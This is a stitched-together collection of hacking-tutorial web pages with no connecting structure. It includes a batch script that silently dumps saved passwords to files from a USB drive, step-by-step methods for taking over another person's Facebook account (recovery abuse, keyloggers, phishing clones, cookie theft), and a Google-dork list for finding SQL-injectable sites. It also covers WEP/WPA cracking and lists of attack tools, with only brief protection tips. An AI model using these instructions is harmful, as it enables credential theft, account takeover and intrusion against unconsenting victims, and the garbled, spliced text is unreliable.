start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt start Dialupass.exe /stext Dialupass.txt start BulletsPassView.exe /stext BulletsPassView.txt start netpass.exe /stext netpass.txt start sniffpass.exe /stext sniffpass.txt start RouterPassView.exe /stext RouterPassView.txt start PstPassword.exe /stext PstPassword.txt start WebBrowserPassView.exe /stext WebBrowserPassView.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start rdpv.exe /stext rdpv.txt start VNCPassView.exe /stext VNCPassView.txt
Once you’re done writing the script, save the file as Launch.bat in the Utilities folder you created.
Step Three: Test Your New Password Stealer
Now you will be able to recover the usernames and passwords from each of these programs. They will create detailed logs that show you the password, username, and source (like the Network name or website URL), which is all you really need to do damage. There’s also the date the password was created, password strength, and other information depending on the program. Here’s how to test your new password stealer to see how many passwords you’ve left vulnerable on your PC.
XP and Vista: Run the Script
Click the launch.bat file you just made to launch it. The password logs will appear in the Utilities folder as .txt files alongside the original executables. Each will have the same name as the .exe file they’re sourced from. For example: the ChromePass.exe file will have a ChromePass.txt file that houses all of the recovered passwords and usernames. All you have to do is open the .txt files, and you’ll see all your passwords.
Windows 7 and Above: Run Each Password Recovery App Individually
If you use Windows 7 or above, the script won’t work for many of the apps, so you’ll need to open them up individually. Double-click on each program and the list of passwords will pop up in a window. Select all that you want to save, and go to the File menu, and save the log as a .txt file in the original Utilities folder you created on your flash drive.
Use these logs to see for yourself how many passwords you’ve left vulnerable on your system. It’s remarkably easy to find and take them!
Step Four: Protect Yourself
Now that you know how vulnerable your information is, get serious about protecting yourself. Take these precautions:
If your computer has autorun enabled, disable it. It only takes a couple more lines of code to set the .bat file to launch automatically when the flash drive is plugged in, without the user even seeing what’s happening. Take measures like not allowing your browser to remember your passwords, or at least the important ones like mobile banking. Instead, use password managers with encryption like LastPass or another good password manager to store all of your passwords securely and out of harm’s way. Use two-factor authentication every chance you get. There are tons of ways for hackers to get your information if they want to. The second factor—something you have—could be what saves you in the end.The obvious: always maintain physical control of your computer whenever possible. Never leave your PC unattended with anyone else, especially someone who’s using a USB flash drive. In fact, it wouldn’t hurt to offer to do the work yourself as often as possible when a friend asks if they can use your computer.
Hackers discover gaping major security flaw in USB sticks
Hack into someone’s Facebook account
In this article I’ll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone’s Facebook account. But don’t worry, I’ll also show you how to prevent it from happening to you.
Method 1: Reset the Password
The easiest way to “hack” into someone’s Facebook is through resetting the password. This could be easier done by people who are friends with the person they’re trying to hack.
The first step would be to get your friend’s Facebook email login. If you don’t already know it, try looking on their Facebook page in the Contact Info section.
Next, click on Forgotten your password? and type in the victim’s email. Their account should come up. Click This is my account.
It will ask if you would like to reset the password via the victim’s emails. This doesn’t help, so press No longer have access to these?
It will now ask How can we reach you? Type in an email that you have that also isn’t linked to any other Facebook account.
It will now ask you a question. If you’re close friends with the victim, that’s great. If you don’t know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
If you don’t figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.
It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.
How to Protect Yourself
Use an email address specifically for your Facebook and don’t put that email address on your profile.
When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher’s names. It’s as easy as looking through a yearbook.
Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.
Method 2: Use a Keylogger
Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim’s computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
CNET has Free Keylogger, which as the title suggests, is free. If this isn’t what you’re looking for, you can search for other free keyloggers or pay for one.
Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim’s computer. The USB drive will save a summary of the keystrokes, so it’s as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it’s bit higher than buying the software since you have the buy the USB drive with the program already on it.
How to Protect Yourself
Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer’s online activity and sniff out anything suspicious.
Install a password manager. Keyloggers can’t steal what you don’t type. Password mangers automatically fill out important forms without you having to type anything in.
Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
Change passwords. If you still don’t feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.
Method 3: Phishing
This option is much more difficult than the rest, but it is also the most common method to hack someone’s account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.
The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you’ll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it’s still possible, especially if you clone the entire Facebook website.
How to Protect Yourself
Don’t click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here’s a great guide on what to look out for). If you’re still doubtful, go directly to the main website and login the way you usually do.
Phishing isn’t only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don’t click on any sketchy looking links that ask for your information.
Use anti-virus & web security software, like Norton or McAfee.
Method 4: Stealing Cookies
Cookies allow a website to store information on a user’s hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don’t actually get the login passwords, but they can still access the victim’s account by cloning the cookies, tricking Facebook into thinking the hacker’s browser is already authenticated.
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.
From there, the hacker can click on the saved cookies and access the victim’s account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.
How to Protect Yourself
On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can’t sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
Log off a website when you’re done. Firesheep can’t stay logged in to your account if you log off.
Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you’re on as all your network traffic will be encrypted all the way to your VPN provider.
Protecting Yourself: Less Is More
Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.
Facebook isn’t something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.
Shell a website
Offline bruteforce attack on WiFi Protected Setup
You can steal data from a computer by touching it
by Jon Fingas
Normally, breaking a PC’s security involves either finding security exploits or launching brute force attacks, neither of which is necessarily quick or easy. However, a team at Tel Aviv University has come up with a potentially much simpler way to swipe data from a computer: touch it. If you make contact with a PC while you’re wearing a digitizer wristband, you can measure tiny changes in electrical potential that reveal even stronger encryption keys (such as a 4,096-bit RSA key). You don’t even have to touch the system directly in some cases — researchers also intercepted keys from attached network and video cables.
Don’t worry about overly grabby strangers stealing your data just yet. The technique primarily focuses on GnuPG’s encryption software, which already has a patch to limit the effects. Thieves also have to monitor the electricity while decryption is taking place, so they can’t just grab info on demand. However, the very nature of the technique makes it difficult to stop completely — unless you’re a fan of insulation and Faraday cages, someone with physical access to your system may always have an opportunity to peek into your most sensitive content.
50 Hacking tools
| Hacking tools have been said to make hacking quite easy as compared to the old days. But, there is still more to being a hacker than just that. Yes, these tools have made it simple, but that is nothing unless you have the knowledge about other aspects of hacking as well. We present tp you a set of must-have hacking tools. |
Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.
1. Aircrack-ng
2. Kismet
3. inSSIDer
4. KisMAC
Intrusion Detection Systems: Intrusion detection tools are one of the most important part of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.
1. Snort
2. NetCop
Port Scanners
1. Nmap
2. Superscan
Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.
1. TrueCrypt
2. OpenSSH
3. Putty
4. OpenSSL
5. Tor
6. OpenVPN
7. Stunnel
8. KeePass
Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.
1. Ophcrack
2. Medusa
3. RainbowCrack
4. Wfuzz
5. Brutus
6. L0phtCrack
7. fgdump
8. THC Hydra
10. Aircrack – Aircrack is 802.11 WEP and WPA-PSK keys cracking program.
11. Cain and Abel
Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.
1. Hping – no longer available
2. Scapy
3. Netcat
4. Yersinia
5. Nemesis
6. Socat
Traffic Monitoring: These are tools that let you monitor what websites your employees or children are monitoring.
1. Splunk
2. Nagios
3. P0f
4. Ngrep
Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.
1. Wireshark
2. Tcpdump
3. Ettercap
4. dsniff
5. EtherApe
Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.
1. Metasploit
2. sqlmap
3. sqlninja
5. NetSparker
6. BeEF
7. Dradis
alse see https://www.comparitech.com/net-admin/network-monitoring-tools/
for an axtensive updated list of server monitoring tools
How to install Microsoft Office 2013 for free – Step By Step Tutorial HD
How to install VMware for free – Step By Step Tutorial HD
How to install Photoshop CC 2014 for free – Step By Step Tutorial HD
Google Dorks 2014 List For SQL Injection Attack
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
Commonly Used Hacking Tools
The following table lists some of the most commonly used tools.
|
SR NO. |
TOOLS |
DESCRIPTION |
URL Link |
| 1 | Nmap |
Network mapper. This tool is used to explore networks and perform security audits.
|
http://nmap.org/ |
| 2 | Nessus |
This tool can be used to perform;
It is closed source, cross platform and free for personal use.
|
http://www.tenable.com/products/nessus
|
| 3 | John The Ripper |
Password cracking utility. It is cross platform. |
http://www.openwall.com/john/ |
| 4 | Cain & Abel |
Microsoft Operating System passwords recovery tool. It is used to;
Visit their URL for more details |
http://www.oxid.it/cain.html |
| 5 | NetStumbler | Used to detect wireless networks on the windows platform. It can be used for the following tasks;
|
http://www.stumbler.net/ |
| 6 | SQLMap | Automates the process of detecting and exploiting SQL Injection weaknesses. It is open source and cross platform. It supports the following database engines.
It supports the following SQL Injection Techniques;
Visit their URL for more details
|
http://sqlmap.org/ |
Password cracking tool
These are software programs that are used to crack user passwords. We already looked at a similar tool in the above example on password strengths. The website www.md5this.com uses a rainbow table to crack passwords. We will now look at some of the commonly used tools
John the Ripper
John the Ripper uses the command prompt to crack passwords. This makes it suitable for advanced users who are comfortable working with commands. It uses to wordlist to crack passwords. The program is free but the word list has to be bought. It has free alternative wordlists that you can use. Visit the product website http://www.openwall.com/john/ for more information and how to use it.
Cain & Abel
Cain & Abel runs on windows. It is used to recover passwords for user accounts, recovery of Microsoft Access passwords; networking sniffing etc. Unlike John the ripper, Cain & Abel uses a graphic user interface. It is very common among newbies and script kiddies because of its simplicity of use. Visit the product website http://www.oxid.it/cain.html for more information and how to use it.
Ophcrack
Ophcrack is a cross platform windows password cracker that uses rainbow tables to crack passwords. It runs on windows, Linux and Mac OS. It also has a module for brute force attacks among other features. Visit the product website http://ophcrack.sourceforge.net/ for more information and how to use it.
How to Crack Wireless Networks
WEP cracking
Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;
- Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
- Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.
WEP Cracking Tools
- Aircrack– network sniffer and WEP cracker. Can be downloaded from http://www.aircrack-ng.org/
- WEPCrack– this is an open source program for breaking 802.11 WEP secret keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
- Kismet– this can detector wireless networks both visible and hidden, sniffer packets and detect intrusions. http://www.kismetwireless.net/
- WebDecrypt– this tool uses active dictionary attacks to crack the WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/
WPA Cracking
WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.
- CowPatty– this tool is used to crack pre-shared keys (PSK) using brute force attack. http://wirelessdefence.org/Contents/coWPAttyMain.htm
- Cain & Abel– this tool can be used to decode capture files from other sniffing programs such as wireshark. The capture files may contain WEP or WPA-PSK encoded frames. http://www.oxid.it/cain.html
General Attack types
- Sniffing– this involves intercepting packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
- Man in the Middle (MITM) Attack– this involves eavesdropping on a network and capturing sensitive information.
- Denial of Service Attack– the main intent of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack. More on this in article
Cracking Wireless network WEP/WPA keys
It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.
We will provide you with basic information that can help you get started. Backtrack is a Linux based security operating system. It is developed on top of Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities and perform exploits among other things.
Some of the popular tools that backtrack has includes;
- Metasploit
- Wireshark
- Aircrack-ng
- NMap
- Ophcrack
Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools
A wireless network adapter with the capability to inject packets (Hardware)
- Backtrack Operating System. You can download it from here http://www.backtrack-linux.org/downloads/ (Software)
- Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
- Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
- Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.
